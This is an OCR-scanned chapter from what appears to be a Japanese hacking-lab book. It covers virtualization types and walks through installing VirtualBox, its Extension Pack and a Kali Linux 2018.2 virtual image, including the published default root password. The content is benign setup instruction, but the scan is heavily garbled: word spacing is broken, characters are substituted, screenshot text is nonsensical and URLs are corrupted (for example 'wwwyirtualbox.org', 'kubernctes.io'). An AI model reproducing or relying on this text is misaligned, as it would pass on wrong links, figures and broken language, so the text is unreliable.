仮想 化 と いう 概念 は 古く か ら あ り ま し た 。 例え ば 、 仮 想 メ モリ は 、HDD を メモ 
リ の よう に 扱う 仕組 み で す 。 物理 メモ リ の 容量 が 足り な く な っ て も 、 仮 想 メ モリ 

が 補っ て くれ ます 。 こ れ も 一 種 の 仮想 化 と いえ ます 。 

1 つの ハー ドウ ェ ア で 複数 の サー ビス を 提供 する こと や 、 ハ ー ド ウェ ア で は 提供 
で き な い サー ビス を ソフ トウ ェ ア に よっ て 提供 する こと も 仮想 化 に な り ま す 。 
近年 は ハー ドウ ェ ュ ア の 発達 に よ り 、] 台 の サー バー で 複数 の 機能 を 実現 する だ け 

で な く 、1 右 の サー バー 内 で 仮想 的 に 複数 の サー バー を 立ち 上 げ る こと も で きる よ 
うに な り ま し た 。 つ まり 、1 つ の OS 内 で 複数 の OS が 動く よう に な っ た わけ で す 。 
これ を サー バー 仮想 化 と いい ます 。 


( 


氷 仮想 化 ソ フト と 仮想 マシ ン 

仮想 環境 と は 、 一 言 で いえ ば ソフ トウ ェ ア で 実現 され た 仮想 的 な か コンビ ピュータ 
で す 。 コ ンピュータ の 中 に コン ビ ピュータ が 存在 する よう に 見 えま す 。 Me 策 。 』 
つの 物理 PC 上 で 複数 の OS を 同時 に 起動 で きま す 。 複数 OS で や り 取 りす る 仮想 
の ネッ トワ ー ク も 必要 と な り ま す が 、 こ れ も る 仮想 環境 の 一 部 と いえ ます 。 

本 書 で は 、 仮 想 環 境 を 実現 する ソフ トウ ェ ア を 仮想 化 ツ フト 、 仮 想 化 ソ フト に 
よる 仮想 的 な PC 環境 を 仮想 マシ ン と 呼ぶ こと に し ます 。 


生 
仮想 マシ ン は 物理 的 な スト レー ジ ( 例 : HDD や SSD など) 上 に 置か れる の で 、 
と て も 用 途 が 広い と いえ ます 。 一 般 の ファ イル と 同様 に 、 仮 想 マ シン も ファ イル 
で 管理 され て いる の で 、 容 易 に コ ヒ ー し た り 移 動 し た り で きま す 。 つ まり 、 仮 想 
マシ ン を 別 の 環境 に 導入 し た り 、 複 製 を 作っ た り で きま す 。 
運用 コス ト と いう 面 で も 、 仮 想 マ シン は 有利 な こと が あり ます 。 物理 マシ ン に 
サー バー を 構築 し た 場合 、OS が CPU や メモ リ を ほとん ど 利 用 し て いな いと いう 
状態 が 多く な り が ち で す 。 こ の よう な 状況 で あっ て も 、PC の 設置 スペ ー ス が 必要 





028 | 第 1 部 | ハッ キン グ ・ ラ ボ の 構築 


で あり 、 電 気 代 が 発生 し ます 。 複数 台 の サー バー が 必要 だ か ら と いっ て 、 ほ と ん 
ど リ ソー ス を 使用 し て いな い 物 理 マ シン を 複数 台 用 意 す る の は も っ た いな いと い 
えま す 。 例え ば 、596 し か リソー ス を 使っ て いな い の で あれ ば 、1 人 台 の 物理 マシ ン 
上 で 仮想 環境 を 構築 し 、 (理論 上 は ) 20 台 の 仮想 マシ ン を 立ち 上 げ れ ば よい こと に 
な り ま す 。 結果 と し て 、 物 理 ス ペー ス と 電気 代 を 大 幅 に 削減 で きま す 。 


沙 仮想 化 ソ フト の 分 類 
仮想 化 ツ フト は 、 次 の 3 種類 に 大 別 き され ます ( 図 2-1)。 


s ホ スト 型 
es ハイ パー バイ ザー 下 
ッッ テ チ ナ テン ジン 簡 










ハー ドウ ェ ア (物理 マシ ン ) 


ホス ト 型 ハイ バー バイ ザー 型 コン テ ナ エ シン ジン 宇 





図 2-1 仮想 化 ソ フト の 分 類 


仮想 化 ツ ソフ ト に は 様々 な 種類 が あり ます 。 どれ か が 最も よい と いう こと は あり 
ませ ん 。 使用 する 環境 に 合わ せ て 、 適 切な 仮想 化 ツ ソフ ト を 選択 し ます 。 


@ ホス ト 型 

ホス ト 型 は 、 ベ ー ス と な る OS 上 に 仮想 化 ツ フト を イン スト ー ル し 、 そ の 仮想 化 
ソフ ト 上 に 仮想 マシ ン を 構築 し ます 。 仮想 マシ ン は 特定 の ハー ドウ ェ ア に 依存 し 
な いた め 、 任意 の OS を イン スト ー ル で きま す 。 そ の た め 、 仮想 マシ ン を 手軽 に 構 
築 で き 、 一 種 の アプ リケーション の よう に 扱え ます 。 

デメ リッ ト と し て 、 ホ スト OS に 負荷 が か か る と 、 仮想 マシ ン の パフ ォ ー マ ンス 
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が 低下 し ます 。 ま た 、 ホ スト OS の セキ ュ リ ティ 問題 か ら 仮想 環境 が 影響 を 受け る 
こと も あり ます 。 

ホス ト 型 は 、 仮想 マシ ン の 作成 が 手軽 で ある た め 、 実 験 用 途 向 け と いえ ます 。 本 
書 で は 、 ホ スト 型 の VirtualBox で ハッ キン グ ・ ラ ボ を 構築 し ます 。 


例 
* Oracle の VirtnalBox (https://wwwyirtualbox.org/ ) 
*・ VMWare の Workstation Player/Pro (https://wwwymware.com/jp/products/ ) 


免 ハイ パー バイ ザー 型 

ハイ パー バイ ザー は 、 動 作 に OS を 必要 と せ ず に ハー ドウ ェ ア 上 で 直接 動作 し 、 
複数 の 仮想 マシ ン を 動か す た め の 土台 と な る ソフ トウ ェ ア で す 。 物理 サー バー の 
CPU に 組み 込ま れ て いる 仮想 化 技術 (InteLVT や AMD-V) を 利用 し ます 。 

ハイ パー バイ ザー 型 の 仮想 マシ ン は 、 物 理 マ シン の ハー ドウ ェ ア に 直接 アク セ 
ス で きま す 。 そ の た め 、 実機 上 で OS を 動か し た と き と 選 色 の な い パ フォ ー マ ン ス 
が 得 ら れ ま す 。 

デメ リッ ト と し て 、 ハ イ パ ー バ イザ ー は ハー ドウ ェ ア を 制御 する た め 、 専 用 ド 
ライ バー が 必要 に な り ま す 。 そ の た め 、 扱 える 周辺 機器 が 少な く な り ま す 。 一 方 、 
ホス ト 型 で あり 、 ホ スト OS が Windows で あれ ば 、 膨 大 な 周辺 機器 を 仮想 マシ ン 
か ら 利 用 で きま す 。 

ハイ パー バイ ザー 型 は 性 能 を 最大 限 に 引き 出せ る た め 、 仮 想 マ シン を 継続 的 に 
動作 させ られ ます 。 加 えて 、 冗長 化 C1) に よっ て 導 定 性 を 向上 で きる た め 、 本 番 
環境 の 運用 に 向い て いま す 。 


例 
*・ Microsoft の Hyper-V (https://docs.microsoft.com/ja-jp/Yirtuaalization/hyper-y-on- 
windows/ ) 
・ VMWare の ySphere Hyperyisor (https:// の wwwymware.com/jp/products/ysphere- 
hypervisorhtml) 
s Linux の KVM (http:/ /wwwilinux-kym.org/page/Main_Pagc) 


*1 : 冗長 化 と は 、 障 害 が 発生 し た と き に 、 自 動 的 に シス テム を 切り 替え て サー ビス の 提供 を 継続 
する こと を 目的 と し ます 。 
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僅 コン テ ナ エ ンジ ン 型 

コン テ ナ エ ンジ ン 型 (コン テ ナ 型 と 略す ) は 、 ユ ー ザ ー か ら 隔 離さ れ た アプ リ 
の 実行 環境 を 作り 、 あ た か も 独立 し た サー バー の よう に 実行 し ます 。 

一 般 的 な 仮想 化 ツ フト は 、 ホ スト OS ある い は ハイ パー バイ ザー の 上 に ゲス ト 
OS を 起動 し 、 そ の OS 上 で アプ リ を 動か す と いう 仕組 み で し た 。 一 方 、 コ ン テ ナ 
型 で は 、 ゲ スト OS を 起動 せ ず に 、 ゲ スト OS 対応 の アプ リ を 起動 し ます 。 コ ン テ 
ナ エ ン ジン (コン テ ナ 管 理 ソ フト ) を 起動 し 、 ホ スト OS に 対応 する ライ プラ リ を 
読み 込む こと で 、 ア プリ の 起動 を 実現 し ます 。 

ゲス ト OS の 起動 や 設定 が 不要 で ある た め 、 ア プリ の 起動 が 早く 、 処 理 が 軽量 と 
いう 特徴 を 持ち ます 。 し か し 、 コ ン テ ナ は ベー ス と な る OS と 同一 の カー ネル を 利 
用 し な けれ ば な り ま せん (カー ネル を 共用 する た め )。 こ の 制限 を 解決 する た め 
に 、 仮 想 化 ソフ ト (Hyper-V や VirtualBox な ど ) の 技術 が 併用 され ます 。 そ の 結 
果 、Linux コン テ ナ と Windows コン テ ナ の 両方 を 利用 で きる よう に な り ま す 。 た 
だ し 、 仮想 化 ソフ ト の 種類 に よっ て は 、|Linux コン テ ナ と Windows コン テ ナ を 同 
時 に 起動 で き な い 」「 ホ スト OS と コン テ ナ の バー ジョ ン に 依存 関係 が ある 」 と い 
う 細か い 制 限 が あり ます 。 

コン テ ナ 型 は 、 軽 量 ・ 高 速 と いう 特徴 を 活か し て 、 開 発 に よく 用 いら れ ま す 。 


例 
* Dockcr (https:/ /wwwrdockercom/) 
* Kubernetes (https://kubernctes.io/ ) 


訪 ホス ト と ゲス ト の 関係 


ホス ト 型 の 場合 、 ホ スト コン ビ ピュータ (ホス ト と 略す ) は 仮想 マシ ン を 立ち 上 
げ る 側 の コン ビュ ー タ で す (2②)。 そ れ に 対し て 、 ゲ スト コン ビュ ー タ (ゲス ト と 
略す ) は 仮想 マシ ン の こと を 指し ます 。 ホ スト OS と いう 場合 は ホス ト の OS、 ゲ 
スト OS と いう 場合 は ゲス ト の OS に な り ま す 。 

例え ば 、Windows に VirtualBox を 導入 し 、 そ の VirtualBox で Linux を 起動 し た 
状況 を 考え ます 。 こ の 場合 、 ホ スト OS は Windows、 ゲス ト OS は Linux に な り ま す 。 


2 : ハイ パー バイ ザー 型 の 場合 、 ホ スト と いう と ハイ パー バイ ザー と し て 動い て いる サー バー を 
指し ます 。 つ まり 、「 ホ スト = ハイ パー バイ ザー」| と いう 解 息 に な り ま す 。 
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VirtualBox を イン スト ー ル し て 、 仮想 環 境 を 構築 


1 VirtualBox の イン スト ー ラ ー を タウ ン ロ ー ド する 

Oracle (https://www.oracle.com/jp/) の サイ ト に アク セス し て 、 検索 ボッ クス 
に "virtualbox と Pe し 、VirtualBox の ペー ジ に 移動 し ます ( 図 222)。 ダ ウン ロー 
ド ペ ー ジ か ら 、 ホ スト OS に 対応 する VirtualBox の イン スト ー ラ ー を ダウ ン ロ ー 
ド し ます 。 an 、 な る べく 最新 版 を 選択 し ます 。 本書 で は 、Windows 10 (64 
ビッ ト ) 向け の イン スト ー ラ ー を 選択 し まし た 。 


Oraels Janam JIntras ぁ ueclue ナ Solwae |) Vetunkaason『 


DraCle VM VirtualBox 


復 数 の ブ プラッ ト フ ォ ー 
ム 和 を 1 つの マシ ン 上 で . 
テス ト 、 開 発 お よび テ 
モン スト レー ショ ン 

ー ム 件 ソフ トウ ェ ア に より 、 福村 ベレー ティ 


ング ・ シ ステ ム を 、 Mec、 PC、Linux ま た は Oracle 
Solarls マ シェ > 上 で 宝 行 で きま 


ダウ ン ロ ー ド ー 


晶 デー タ シ ー ト [PDF) 


山 要 リピ ルー ン 、 


バフ ォ ー マ ンス と 能力 


e 1 つの デス フク トップ で 滴 基 の オペ レー ティ ング ・ シシ 
ステ ム が 和 格 動 





2-2 VirtualBox の ペー ジ 
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(② イ ンス トー ラー を 実行 する 

イン スト ー ラ ー を 実行 し て 、 ウ ィ ザ ー ド の 指示 に し た が い イ ンス トー ル し ます 。 
イン スト ー ル 中 に 、 ネ ットワーク イン ター フェ ー ス が リセ ッ ト さ れる の で 、 別 の 
作業 は 止め て お きま す 。 

"Oracle Corporation Universal Serial Bus デバ イス の イン スト ー ル の 許可 を 要 
求 さ れる の で 、 許 可 し て イン スト ー ル し ます 。 


3③)VirtualBox を 起動 する 

イン スト ー ル が 終了 し た ら 、VirtualBox を 起動 し ます 。Oracle VM VirtualBox 
マネ ー ジ ャ ー が 表示 され ます 。 こ れ を 、 本 書 で は VirtualBox の | メイ ン 画 面 」 と 
呼ぶ こと に し ます ( 図 2-3)。 日 本 語 Windows の 場合 、 起 動 し た 時 点 で メニ ュー や 
メッ セー ジ が すでに 日 本 語 で 表示 され て いま す 。 


疹 Oroclc VN MrtuslBox マネ ー ジ ャ ー 
rf ル F| 候 下 マシ ツン (M) 見 7(H| 

( 間 
導 規 (ND 放 G| 了 彼 可 記紀 T。 


よ 52d7WEe 


よ J ン ビ | すべ 
0 ET 2 
て し し 


ーー 


Ft キー で ヘル プ を 系 示 で きす す 。 た は 時 新人 
取得 5 0 





図 2-3 VirtualBox の メイ ン 画 面 
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2-3 、 VirtualBox の 基本 設 





VirtualBox の メイ ン 画 面 の メニ ュー か ら | 環境 設定 」 を 選択 し ます 。 こ こ で 、 仮 
相 環 境 を 利用 する に あたっ て の 基本 的 な 設定 を 適用 し ます 。 


効 「 デ フォ ルト の 仮想 マシ ン フ ォ ル ダー」 を 変更 する 

ハッ キン グ ・ ラ ボ を 拡張 する に し た が い 、 仮 想 マ シン に 導入 する ゲス ト OS は 
人 次 々 と 増え て いき ます 。 そ の だ た だめ 、 あら か じ め ゲ スト OS を 配置 する 場所 を 決め て 
お く こ と を お すす めし ます 。 ま た 、 ゲ スト OS を 複数 管理 する た め に は 、 数 十 G バ 
イト 以上 必要 に な る の で 、 そ れ を 考慮 し て 余裕 の ある 誰 域 を 準備 し ます 。 

デフ ォ ル ト で は C\Users\< く ユー ザー 名 >\ せ VirtualBox VMs フォ ル ダ ー に 仮 
想 マ シン が 生成 され る よう に 設定 され て いま す 。 本 書 で は C:\VM_Guest 
\VBox\ フォ ル ダ ー を 作成 し て お き 、 こ れ を デフ ォ ル ト の 仮想 マシ ン フ ォ ル 
ダー に し ます 【 図 24)。 





ング VirualBox - 革 却 飼 定 


属 -* | 
2 


| アッ プ テ ー ト VRDP 323E う イブ ラリ BI |] VBaxAu 和 h 








図 の 2.4 デフ ォ ル ト の 仮想 マシ ン フ ォ ル ダー の 変更 


潤 VirtualBox Extension Pack を 導入 する 
人 … VirtualBox Extension Pack で 追加 で きる 機能 


VirtualBox Extension Pack (Extension Pack と 略す ) と は 、VirtualBox に 機能 
を 追加 する た め の プ ログ ラム で す 。 例え ば 、 次 の 機能 な ど を 追加 で きま す 。 
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* USB20/30 の サボ ー ト 

* VirtualBox の リモ ー ト デス クト ッ プ (RDP) 機能 
s ディ スク の 暗号 化 

* Web カ メラ の サポ ボ ポート 


特に 、USB2.0 以 上 の サポ ー ト に より 、 転 送 速度 の 向上 が 期待 で きま す 。 外 付け 
HDD や 無線 LAN アダ プター の 性 能 を 引き 出せ ます 。 


僅 Extension Pack 導入 の 手順 
Extension Pack は 次 の 手順 で 癌 入 で きま す 。 


①Extension Pack を ダウ ン ロ ー ド する 
VirtualBox の サイ ト か ら 、Extension Pack を ダウ ン ロ ー ド し ます 。 イ ンス トー 
ル 済 み の VirtunalBox と 同じ バー ショ ン の も の を 選択 し ます ( 図 2-5) 。 


Downloads - Oracle VM VirtualBox 


https://wwwyirtualbox.org/w 止 Downloads 
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図 2-5 Extension Pack の ダウ ン ロ ー ド 
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な お 、VirtualBox の バー ジョ ン は 、 メ ニュ ー の 「 ヘ ルプ | > [VirtualBox に つ 
いて 」 か ら 確 認 で きま す 。 


② Extension Pack を イン スト ー ル する 


ダウ ン ロ ー ド し た ファ イル を ダブ ルク リッ ク す る と 、 イ ンス トー ル の 確認 画面 
が 表示 され ます 。 [インストール] ボタ ン を 押し て 、 イ ンス トー ル し ます ( 図 26)。 
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図 2-6 Extension Pack の イン スト ー ル 確認 画面 


3③ イン スト ー ル され た こと を 確認 する 

イン スト ー ル が 完了 する と 、 完 了 ダ イア ログ が 表示 され ます 。 ま た 、 環 境 設定 
画面 の 機能 拡張 ] で 、 イ ンス トー ル し た 拡張 パッ ケー ジ が 表示 され ます ( 図 2-7)。 
この 画面 か ら 追 加 ・ 削 除 も でき ます 。 


の > Vitua8ox・ 富夫 人 


千 能 撤 誠 
採り (ウケ ー ツ (E) 








図 2-7 「 機 能 拡張 」 画面 
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VirtualBox を 用 いて 、 初 め て の 仮想 マシ ン を 構築 し ます 。 ま ず は Kali Linux と 
時 ば れる OS の 仮想 マシ ン を 作成 し ます 。 初回 の 仮想 マシ ン 構 築 な の で わか りや す 
く 解説 し ます 。 

ここ で 解説 する 内 容 は VirtualBox の 基本 操作 で あり 、 他 の 仮想 マシ ン を 構築 す 
る 基本 と な り ま す 。 


0 
ーーー 


誠 Linux と は 


Linux と は 、1991 年 に Linus Torvalds 氏 に よっ て 開発 され だ た 、 サ ー バ パ バー 向け の 
OS で す 。Linux は 、 フ リー か つ オ ー プ ン ソ ー ス (*3) で 誰 で も 自由 に 改変 ・ 再 配布 
で きま す 。 安定 し て 動作 する こと が 評価 され 、 現 在 で は 様々 な 場面 で 使わ れ て い 
ます 。 も と も と は サー バー 用 途 で し た が 、 近 年 は デス クト ッ プ 向け や スマ ホ 向 け 
こも 使わ れ て いま す 。 

ハッ キン グ ・ ツ ー ル の 約 8 割 は 、Linux 環境 向 け に 開発 され て いる と も いわ れ て 
いま す 。 つ まり 、Linux を 自由 に 使え る よう に な れ ば 、 ほ と ん どの ハッ キン グ ・ 
ツー ル が 使用 で き 、 困 る よう な 状況 は な いと いえ ます 。 そ れ 以 外 に も 、 Linux に は 
次 の よう な 大 き な 魅 力 が あり ます 。 


e 他 の OS ほど 高い スペ ッ ク わこ 求 さ れ な い 。 
s Linux の 仕組 み を 深く 知る ほど 、 目 分 好み に カス タマ イズ で きる 。 Windows よ 


り 安全 に 設定 で きる し 、 そ の 逆 に も で きる 々 る 


誠 Linux ディ スト リピ ビュ ーション と は 

一 般 に Linux は 、Linux デイ スト リピ ビュ ーション (ディ スト リピ ビュ ーション と 暑 
す ) と いう 形 で 配布 され て いま す 。 単純 に いう と 、| ディス トリ ビュ ーション = 
LinuX カ ー ネ ル + ア プリ | と いえ ます 。 こ こ で いう Linux カー ネル と は 、OS の コア 


“3: The Open Source Initiahiive オー プン ソー ス の 定義 (日 本 語 ) 


http://wwWw.ODenSource.jD/ osd/osd-japanese.html 
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と な る 部 分 を 指し ます 。 ハ ー ド ウェ ア の 管理 、 フ ァイル シス テム ("4)、 プ ロ セ ス 
管理 、 メ モリ 管理 な ど と いっ た OS の 基本 機能 を つか さ ど り ま す 。 

ディ スト リピ ュー ショ ン に よっ て 、 デ フォ ルト イン スト ー ル され て いる コマ ン 
ド や ライ ブラ リ 、 ア プリ ケー ショ ン が 異な り ま す 。 


湊 Kali Linux と は 


Kali Linux (Kali と 略す ) は 、 ペ ネト レー ショ ン テ ス ト 用 の Linux ディ スト リ 
ビュ ーション で す 。 ペ ネト レー ショ ン テ ス ト と は 、 実 際 の 攻撃 手法 を 試み て 、 シ 
ステ ム に 脆 詳 性 が な いか どう か を テス ト す る 手法 で す 。 侵入 テス ト と も 訳 さ れ ま 
す 。Kali に は 、 300 以 上 の ペ ネ ト レー ショ ン テ ス ト 用 の プロ グラ ム が 最初 か ら イ ン 
スト ー ル され て いま す 。 そ の た め ダ ウン ロー ド や イン スト ー ル の 手間 が 省け ます 。 
Debian を ベー ス に し て 構築 きれ て いま す 〈⑤5) 。 

本 書 で は 積極 的 に Kahi を 利用 し ます が 、 各自 好 み の OS や ディ スト リ ビ ピュー ショ 
ン 上 に 攻撃 ツー ル を イン スト ー ル し て も 問題 あり ませ ん 。 


Kali の 仮想 イメ ー ジ を ダウ ン ロ ー ド する 


Kali の 公式 サイ ト に は 、VirtualBox 用 の 仮想 イメ ー ジ が 用 意 き され て いま す 。 こ 
の 仮想 イ メー ジ を 用 いれ ば 、 イ ンス トー ル の 手 聞 を 減ら せる の で 、 こ れ を 利用 す 
る 方 法 を 紹介 し ます 。 


①uTorrent を イン スト ー ル する 
Kai の ダウ ン ロ ー ド を 早く 終わ ら せ る た め に p Torrent を イン スト ー ル し ます 。 
も し 、w Torrent を イン スト ー ル し た く な い 場 合 、 こ の ステ ッ プ は 飛ば し て くだ さい 。 
次 の URL に アク セス し て 、z Torrent (Pro 版 で は な く ス テイ ブル 版 ) を ダウ ン 
ロー ド し 、 イ ンス トー ル し ます 。 


4: フ ァイル シス テム と は 、 HDD な どの スト レー ジ 、USB メ モリ 、CD や DVD と いっ た デバ イス 
に アク セス する た め の 仕 組み で す 。Linux カー ネル で は VFS (Virtual File System : 仮想 ファ イ 
ル シ ス テム ) を 採用 し て お り 、 各 デパ イス を ファ イル と し て 取り 扱い ます 。 こ れ に より 、 ネ ッ ト 
ワー ク 越 し の スト レー ジ で あっ て も 、USB メ モリ で あっ て も 、 あたかも ファ イル の よう に し て 居 
過 的 に アク セス で きま す 。 


5 : Debian ベ ー ス の Linunx デ ィ ス トリ ビュ ーション は 他 に も あり ます 。 例え ば 、Ubuntm や 
Knoppix が 有名 で す 。 
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Windows Downloads - / Torrent' (ulorrent) - a (Yery) tiny Birlorrent client 


https://wwwutorrentcom/intl/ja/downloads/win 





現在 の バー ジョ ン で は 、 言 語 フ ァイル を イン スト ー ル し な く て も 自動 的 に 日 本 
語 に 対応 し ます 。 


②)Kali Linux を ダウ ン ロ ー ド する 
プラ ウザ で Kahi の ダウ ン ロ ー ド ペー ジ に アク セス し ます 。 


Kali Linux Custom Image Downloads - Offensive Security 


https://wwwoffensive-security.com/kali-linux-vmware-yirtualbox-image-download/ 





"Kali Linux VirtualBox Images と いう タプ を 選択 し ます 。 す る と 、 そ の 下部 に 
イメ ー ジ 名 が 表示 され ます ( 図 28)。 32 ビッ ト 版 と 64 ビ ッ ト 版 が 用 意 さ れ て いる 
の で (*⑥)、 自 分 の 環境 に 合わ せ て 、 好 み の も の を 選択 し ます 。 こ こ で は 、64 ビ ッ 
ト 版 で ある "Kali Linux 64 bit VBox を 用 いる こと に し ます 。 


Download Kali Linux VMware, VirtualBox and Hyper-V Imaqes 


Want to download Ka Unux custorm lmages? We have generated seweral Kall nux VMware, VirtualBox and Hyper-V 
Images which we would llke to share with the cormmunity. Note that (he images prOvded beloyr are rmaintalined On 3 
^*best effort” basils amd all future updates w 中 be llsted on ls page. Futhermore, Offensve Security does not provide 
techmical suppott for our coOntributed Kali nux Images、 Support for Kall can be obtained vs various methods Isted on 
the Kall nux Communlty DagG. These Images have a default Password of "toor” amd may have DrC-EeneraUed SSH ho 
keys。 


Kall Linux VMware Imaqes Kal Lnux VirtualBox Imaqes Kall Lnux Hyper-V ]maqes 





ー ャ ーー 


Imsge ame Torrent SEe Version SHA2565Sum 


Kali Linux Vbex 64BKIOVA] Torrent 3.2C 2018.2 うつ 2 す 9Oc@ っ Co も o こ で 9 て SC93 う 1.4o00 こ う 7Do3S つ 4 て 223 そ o す 4 36cS7CbE4Ec dhOW 3= 


Kalh Linur Vbox 32 Bt IOVA] Torent 3. 2018.2 cr 2051pc も 41cc 区 CD うう Tc 8f 56bbcT OO0cdP436442f<54ec ecbbdc も 





図 2-8 VirtualBox の イメ ー ジ ファ イル の ダウ ン ロ ー ド 


*6 : パー ジョ ン に よっ て は 、 容 量 が 小さ い light 版 が 用 意 さ きれ て いる こと も あり ます 。 
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この ペー ジ で は 、 最 新版 の ダウ ン ロ ー ド リン ク が 表示 され て いま す ("⑦)。 

Jmage Name 欄 の リン ク を 押す と 、 ダ ウン ロー ド が 始ま り ま す 。 ま た 、 
"Torrent' と いう リン ク を 押す と Torrent 経 由 で ダウ ン ロ ー ド が 始ま り ま す 。 
Torrent を イン スト ー ル 済み で ある 場合 は 、Torrent 経 由 で ダウ ン ロ ー ド する こと 
を お すす めし ます 。Torrent 経由 で ダウ ン ロ ー ド する と 、 直 接 ダ ウン ロー ド す る よ 
り も 4 倍 で らい 速く な り ま す 。 


厳 Kali の 仮想 イメ ー ジ を イン スト ー ル する 
Kali の 仮想 イメ ー ジ を 用 いて 、Kali の 仮想 マシ ン を 作り ます 。 


① ダ ウン ロー ド し た ファ イル の 形式 を 確認 する 

ダウ ン ロ ー ド し た ファ イル を 右 ク リッ ク し て プロ パテ ィ を 開き 、ova フ ァイル 
で ある こと を 確認 し ます ("8)。ova ファ イル (9) で あれ ば 、 そ の まま ステ ッ プ ⑨② 
に 進み ます 。 |「.7z] や 「.gz」 の 形式 で 圧縮 され て いれ ば 、 解凍 ソフ ト ( 例 :7zjp な 
ど ) を 用 いて 解凍 し て 、ova フ ァイル を 取り 出し ます 。 

な お 、 イ ン ボ ポー ト 時 は 、ova ファ イル を どこ に 置い て も 問題 あり ませ ん 。 


②)ova ファ イル を 指定 する 

VirtualBox を 起動 し ます 。 メ ヌメ ニ ュー の 「 フ ァイル 」 > | 仮想 アプ ライ アン ス の 
イン ボー ト 」 を 選択 し 、 ス テッ プ ① の ova フ ァイル を 指定 し て 、[ 次 へ ] ボタ ン を 
押し ます ( 図 2-9)。 


7 : 本 書 の 執筆 時 (2018 年 8 月 ) は 、 バ ー ジ ョ ン 2018.2 が 最新 で し た 。 読者 の 皆さん は リン ク を ク 
リッ ク し て 最新 版 を ダウ ン ロ ー ド し て くだ さい 。 


3 : 第 3 章 の 「3-1 ファ イル の 拡張 子 を 表示 する 」 を 適用 し て いる 場合 に は 、 プ ロ パ ティ を 表示 す 
る こと な く ova フ ァイル で ある こと が わか り ま す 。 


9 : 仮想 マシ ン は 、 設 定 フ ァイル と 仮想 ディ スク の ファ イル か ら 構 成 さ きれ て いま す 。 し か し 、 単 
純 に ファ イル と し て 取り 出し た だ け だ と 、 別 の 仮想 環境 で 使用 で きま せん 。 取り 出し た ホス ト 
OS の 仮想 化 ツ フト に 依存 し た 形式 で ある た めで す 。OVA と は 、 規 格 化 され た 仮想 マシ ン の ファ 
イル デー タ で す 。 ova フ ァイル の 形式 で あれ ば 、 様 々 な 仮想 環境 で 使用 で きま す 。 そ の た め 、 仮 
想 マ シン を 提供 する と き は 、ova フ ァイル が よく 利用 され ます 。 
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- 仮 弄 アプライアンス の イツ ポー ト 


インポ ボート し た い 仮 区 ア ブラ イア ンス 


VirtualBi# 今 の 上 ころ Qpan Vrtualesion Formal (VDT 人 2 イアン 2 イン ポー 
を ボート CC いま う 。 析 世 す SEB、 トンボ こし イル を RUCCESDL の 


じき Lzms\apusremLiesk ical- lx-20 18 2 ebnx- sndb4 rs| 





図 2.9 ova フ ァイル の 指定 


3 仮想 マン シン 名 や ハー ドウ ェ ア の 構成 を 変更 する 

構築 され る 仮想 マシ ン の 情報 (OS だ け で な く ハ ー ド ウェ ア の 情報 も 含む ) が 列 
共 さ れ ま す 。 

も し 名 前 や ハー ドウ ェ ア の 艇 成 を 変更 し た い 場 合 は 、 ダ ブル クリ ッ ク し て 編集 
し ます 。 特に 仮想 マシ ン の 名 前 は 、 他 と 区 別 で きる よう に バー ジョ ン や OS を 明記 
する こと を お すす めし ます 。 ここ で は 、 名 前 を "Kali-Linux-2018.2 (64bit) に 変更 し 
ます C10)。 

仮想 ディ スク イメ ー ジ に は 、vmdk フ ァイル が 展開 され る パス が 表示 され る の 
で 、'C:\VM_Guest\VBox\Kali-Linux-2018.2-vbox-amd64\Kali-Linux-2018.2- 
vbox-amd64-disk001vymdk で ある こと を 確認 し ます 。| デフ ォ ル ト の 仮想 マシ ン 
フォ ル ダ ー\ も と の 仮想 マシ ン 名 」 の 形式 に な っ て いる は ず で す "11)。 仮想 マ シ 
ン 名 は 手動 で 変更 し まし た が 、 こ の パス は 変更 し な く て も 問題 あり ませ ん 。 

構成 の 内 容 に 問題 が な けれ ば 、[ イ ン ポ ー ト ] ボタ ン を 押し ます ( 図 2-10)。 


*10 : 仮想 マシ ン の アイ コン で も 32 ビ ピット か 64 ビット か を 識別 で きま す 。32 ビ ッ ト の と き は 仮想 
マシ ン の アイ コン に 何 も 表 示さ れ て いま せん が 、64 ビッ ト の と き は アイ コン の 左上 に 「64」 と 表 
示さ れ ま す 。 


*11 : 「 デ フォ ルト の 仮想 マシ ン フ ォ ル ダー」| の 設定 が 反映 され て いま す 。 
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を 抜 相 ア ブラ イア ッ ス の イッ ポー ト 
仮 本 アプ ライ アン フス の 設定 


人 9 も WT hi 


を 宮 2h に すこ と が て さま 


| 技 間 シス テム 1 


( 記 表 ぁ Kai Linux 
(g 守 呈 URL httpsJ/wwvekalLoro/ 
0 り バン ソ ダ - Offcnsve Secufwy 
( 記 ベッ ダ -URL hp ソ /wwvoWfensme-secuntyCorw 
(パー ジョ ッ Rolling [2018.2) x64 
| 妥 男 Kai Rollinq [2O1H.2| *54 
し すぐ て ① ネ ッッ ドコ ー ウ カー ドア ドル ス を 市 初 明 人 上 
阪 紀 アプ ライ ア - フ は 考 そ ざれ て (きせ ん 





デフ ォ ル ト 則 に 記す キャ ッ セ ゼル 





図 2-10 仮想 マシ ン 名 の 変更 後 


④ イ ン ボ ポート 完了 を 確認 する 

イン ポー ト に し ば らく 時 間 か か る の で 待ち ます (数 分 程度 )。 イ ン ポ ボー ト に 成功 
する と 、VirtualBox の メイ ン 画 面 の 左 ペ イン (*12) に 仮想 マシ ン の アイ コン が 表示 
され ます ( 図 2-11) 。 


形 Ormc ik VM VimualBox マネ ー ジ ャ ー 
ファ イ MF) 仮 坦 マシ ツ (M) ヘル プ (H) 
で に] ム | ぐ ヽ 
v - あ ・ 
狐 鍛 (N) :2 定 還 訪 忠 引 (TL yuji 7 ロー し ウー 尼 G) 
Kali-Limgx-201 き 2 (54bit) ュー 「 
[ ぬ ) 5 よ デ を yt! 


RS 


居 下 て りー も 作成 する に は の イリ 2 
5 ソウ ツー ルーD【 王 導 基 / を jp の 


FI 
守 一 て ます 。 また は 最新 情 
kpyirhnhnr ig (だ 逐 v 





図 2-11 Kali の 仮想 マシ ン を 作成 で きた 


この アイ コン を 選択 し 、 詳 細 を 押す と 、 仮 想 マ シン の 構成 が 表示 され ます 。「 説 


*12 : ペイ ン (pane) と は 、 ウ ィ ン ド ウ 内 の 区 分 けさ れ た 領域 の こと で す 。 
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明 | 欄 に 注目 する と 、root の デフ ォ ル ト パ ス ワー ド に 関す る 情報 が 明記 され て い 
ます ( 図 2.12) 。root の デフ ォ ル ト パ ス ワー ド は toor で す 。 こ れ は Kali に 共通 する 
内 容 で あり 、 最 初 に ログ イン する 場合 に は この アカ ウン ト を 用 いま す 。 


博 Oracle Vi VirtuaBox マネ キー ジャー 

ファ fPF) 了 牙 粗 マ シン IM) ヘル ズ (H) 

